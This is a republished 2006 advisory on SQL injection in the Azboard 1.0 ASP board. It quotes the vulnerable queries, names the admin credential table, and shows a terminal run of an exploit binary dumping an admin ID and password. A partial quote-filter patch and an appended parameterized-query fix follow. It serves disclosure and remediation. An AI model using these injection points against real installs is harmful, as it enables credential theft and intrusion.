Azboard <= 1.0 Multiple Sql Injections

2006.05.23
Credit: geinblues
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Title : Azboard <= 1.0 Multiple Sql Injections
Published : 2006.5.14
Author : x90c(정경주)@chollian.net/~jyj9782/
Link : http://user.chol.com/~jyj9782/sec/azboard_advisory.txt

0x01 Summary

Azboard is a web board written in ASP (Active Server Pages). It has a SQL injection hole, so we can get the admin (bbs)'s ID and password and so on. Let's start by looking at the code.

0x02 Codes

~/azboard/list.asp:
-
49: if searchstring<>"" then
50: sql="select count(board_idx) from board where " & search & " like '%" & searchstring & "%' and cate='"&cate&"' "
51: else
52: sql="select count(board_idx) from board where cate='"&cate&"'"
53: end if
-
The above lines are vulnerable to SQL injection, as you can see: the request values search, searchstring and cate are concatenated straight into the query string. y0! ;)~

~/azboard/admin_ok.asp:
-
27: SQL = "SELECT cate,admin_id,admin_pass,board_name FROM board_admin where admin_id='"&id&"' and cate='"&cate&"'"
-
I found the fields ('admin_id', 'admin_pass') and table ('board_admin') in this file.

0x03 Exploit

[root@ebp exploits]# ls -al azboard_blue.c
-rw-r--r-- 1 root root 4771 5월 14 23:30 azboard_blue.c
[root@ebp exploits]# ls -al azboard_blue
-rwxr-xr-x 1 root root 17163 5월 14 23:30 azboard_blue
[root@ebp exploits]#
[root@ebp exploits]# make azboard_blue
cc azboard_blue.c -o azboard_blue
azboard_blue.c: In function `tu1':
azboard_blue.c:55: warning: assignment makes pointer from integer without a cast
azboard_blue.c:59: warning: assignment makes pointer from integer without a cast
azboard_blue.c:63: warning: assignment makes pointer from integer without a cast
azboard_blue.c:67: warning: assignment makes pointer from integer without a cast
[root@ebp exploits]# ./azboard_blue
azaboard 1.0 <= 0day : $ ./azboard_blue <azboard URL> <cate>
~ x90c (at) chollian (dot) net/~jyj9782
[root@ebp exploits]#
[root@ebp exploits]# ./azboard_blue http://192.168.0.5 testbbs
[ LANG=KOR admin id ] admin
[ LANG=KOR admin pass ] 1234
[root@ebp exploits]#

0x04 Patch

~/azboard/list.asp:
..
if instr(search, "'") > 0 or instr(cate, "'") > 0 or instr(searchstring, "'") > 0 then
    Response.redirect "error.asp"
end if
..

Thanks for many 0p3n-H4ck3rz!
- Blu3h4t Team.
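The quote filter in the patch above closes the hole only partially: the `search` value is spliced into the query as a column name, a position where no single quote is needed to alter the statement, and the same string-concatenation pattern in admin_ok.asp line 27 is not touched at all. The durable fix is to bind every request value as a parameter and to take the column name from a fixed list. The following is an added example that is not the advisory's or Azboard's own code; it assumes an ADO connection string in `strConn` and that `subject`, `content` and `writer` are the only legitimately searchable columns (both assumptions, not taken from the advisory):

```vbscript
<%
Option Explicit
' Added example: parameterized replacements for the two vulnerable queries.
' Assumptions: strConn holds an ADO connection string; the searchable
' columns of the board table are the three listed in SafeColumn.

Const adVarChar = 200
Const adParamInput = 1
Const adCmdText = 1

Function SafeColumn(name)
    ' An identifier cannot be bound as a parameter, so the column name
    ' must come from a whitelist instead of the request.
    Select Case LCase(name)
        Case "subject", "content", "writer"
            SafeColumn = LCase(name)
        Case Else
            SafeColumn = ""    ' unknown column: refuse
    End Select
End Function

Function OpenCommand(strConn)
    Dim conn, cmd
    Set conn = Server.CreateObject("ADODB.Connection")
    conn.Open strConn
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    Set OpenCommand = cmd
End Function

' Replacement for list.asp lines 49-53.
Function CountPosts(strConn, search, searchstring, cate)
    Dim cmd, rs, col
    col = SafeColumn(search)
    If searchstring <> "" And col = "" Then
        Response.Redirect "error.asp"
        Response.End
    End If

    Set cmd = OpenCommand(strConn)
    If searchstring <> "" Then
        ' Column name from the whitelist; both values bound, so a quote in
        ' searchstring or cate is data, never SQL syntax.
        cmd.CommandText = "SELECT COUNT(board_idx) FROM board WHERE " & col & _
                          " LIKE ? AND cate = ?"
        cmd.Parameters.Append cmd.CreateParameter("p1", adVarChar, adParamInput, 255, "%" & searchstring & "%")
        cmd.Parameters.Append cmd.CreateParameter("p2", adVarChar, adParamInput, 50, cate)
    Else
        cmd.CommandText = "SELECT COUNT(board_idx) FROM board WHERE cate = ?"
        cmd.Parameters.Append cmd.CreateParameter("p1", adVarChar, adParamInput, 50, cate)
    End If

    Set rs = cmd.Execute
    CountPosts = rs(0)
    rs.Close
    cmd.ActiveConnection.Close
End Function

' Replacement for admin_ok.asp line 27: returns the recordset, EOF if no match.
Function AdminRow(strConn, id, cate)
    Dim cmd
    Set cmd = OpenCommand(strConn)
    cmd.CommandText = "SELECT cate, admin_id, admin_pass, board_name " & _
                      "FROM board_admin WHERE admin_id = ? AND cate = ?"
    cmd.Parameters.Append cmd.CreateParameter("p1", adVarChar, adParamInput, 50, id)
    cmd.Parameters.Append cmd.CreateParameter("p2", adVarChar, adParamInput, 50, cate)
    Set AdminRow = cmd.Execute
End Function
%>
```

The `%` wildcards are placed inside the bound value rather than in the SQL text, so `LIKE ?` works unchanged; a `%` or `_` typed by the user then only widens the search, it cannot change the statement. The parameter sizes (255 and 50) are illustrative and should match the actual column widths in the Azboard schema.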


Copyright 2017, cxsecurity.com